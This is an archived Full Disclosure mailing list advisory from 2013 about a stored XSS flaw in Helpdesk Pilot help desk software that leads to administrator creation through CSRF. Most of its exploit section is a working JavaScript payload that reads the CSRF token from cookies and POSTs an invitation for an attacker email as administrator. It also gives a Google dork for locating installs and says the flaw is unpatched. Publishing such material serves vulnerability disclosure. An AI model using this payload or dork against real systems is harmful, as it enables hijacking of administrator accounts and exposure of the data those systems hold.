Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

(no subject)
From: Ciaran McNally <ciaran.mcnally3 () mail dcu ie>
Date: Mon, 2 Dec 2013 12:32:11 +0000

###########################################################

                             Ciaran McNally

Application:     Helpdesk Pilot
                 http://www.helpdeskpilot.com/
Versions:        All versions.
Platforms:       Windows, Mac, Linux
Bug:             XSS/CSRF Add Administrator
Exploitation:    WEB
Date:            30 November 2013.
Author:          Ciaran McNally
Web:             http://makthepla.net/blog/=/helpdesk-pilot-add-admin
My Twitter: https://twitter.com/ciaranmak
Google Dork: intext:"powered by Helpdesk Pilot"

#######################################################################

1) Bug.
2) The exploit.
3) Fix.

###########################################################
Help desk software or your business...
###########################################################

======
1) Bug
======
If attacker can submit a ticket, he/she simply needs to include a malicious
Url within the the ticket.

Javascript injection then occurs via the Url that is incorrectly sanitized.

http://example.com/<script>prompt(1);</script>



###########################################################

===============
2) The "exploit"
===============

For a simple Proof of concept use the example above, you will see the
expected popup within the ticketing system once it's viewed.

To add an administrator use a malicious Url similar to the following...
(Make sure there are no spaces otherwise it won't be parsed correctly)

http://makthepla.net/
<script>$(document).ready(function(){$.ajax({type:"POST",url:"http://
[HOST]/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=[ATTACKER_MAIL]&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

where [HOST] is the location of the software
and [ATTACKER_MAIL] is the attacker's email.

Attacker will recieve a mail if it successfully executes to complete
admin addition.

The example above contains alerts simply for POC, this is the one used
in the video on my blog post.



#######################################################################

======
3) Fix
======

Was Reported to the vendors twice,

Fix in progress...

#######################################################################

--
maK :)

-- 
-------------------------------------------
*-maK-*
Redbrick Administrator 2013/2014
Redbrick Webmaster 2012/2013
Redbrick Events Officer 2011/2012
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • (no subject) Ciaran McNally (Dec 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault